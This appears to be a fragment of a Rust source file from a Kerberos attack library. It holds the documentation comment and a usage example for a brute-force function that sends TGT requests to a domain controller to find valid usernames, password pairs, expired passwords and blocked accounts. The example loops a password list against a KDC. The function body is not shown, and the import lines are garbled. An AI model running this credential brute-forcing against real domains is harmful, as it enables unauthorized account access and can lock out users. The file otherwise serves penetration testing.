1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
use crate::;
use error_codes;
use Key;
/// Perform TGT requests in order to discover user credentials based on the KDC response
///
/// WARNING: This attack should be performed carefully since it can block user accounts
///
/// This brute force technique allows you to discover:
/// Valid username/password pairs, Valid usernames, Expired passwords, Blocked or disabled users
///
/// # Examples
///
/// ```
/// use cerbero_lib::{brute, BruteResult, KdcComm, Kdcs, TransportProtocol};
/// use std::net::{IpAddr, Ipv4Addr};
///
/// fn main()
/// {
/// let mut kdcs = Kdcs::new();
/// let kdc_ip = IpAddr::V4(Ipv4Addr::new(127, 0, 0, 1));
/// kdcs.insert("DOMAIN.COM".to_string(), kdc_ip);
///
/// let mut kdccomm = KdcComm::new(kdcs, TransportProtocol::TCP);
///
/// let passwords = ["password1", "password2"];
///
/// match kdccomm.create_channel("DOMAIN.COM")
/// {
/// Ok(channel) =>
/// {
/// for password in passwords.iter()
/// {
/// match brute("DOMAIN.COM", "Username".to_string(), password.to_string(), channel.as_ref())
/// {
/// Ok(result) => match result
/// {
/// BruteResult::ValidPair(username, password) =>
/// {
/// println!("Valid User \"{}\" with Password \"{}\"", username, password)
/// },
/// BruteResult::InvalidUser(username) =>
/// {
/// println!("Invalid User \"{}\"", username)
/// },
/// BruteResult::ValidUser(username) =>
/// {
/// println!("Valid User \"{}\"", username)
/// },
/// BruteResult::ExpiredPassword(username, password) =>
/// {
/// println!("Valid User \"{}\" with Expired Password \"{}\"", username, password)
/// },
/// BruteResult::BlockedUser(username) =>
/// {
/// println!("Blocked User \"{}\"", username)
/// },
/// },
/// Err(e) => panic!("Failed to brute force the KDC: {}", e),
/// }
/// }
/// },
/// Err(e) => panic!("Failed to create a channel to the KDC: {}", e),
/// }
/// }
/// ```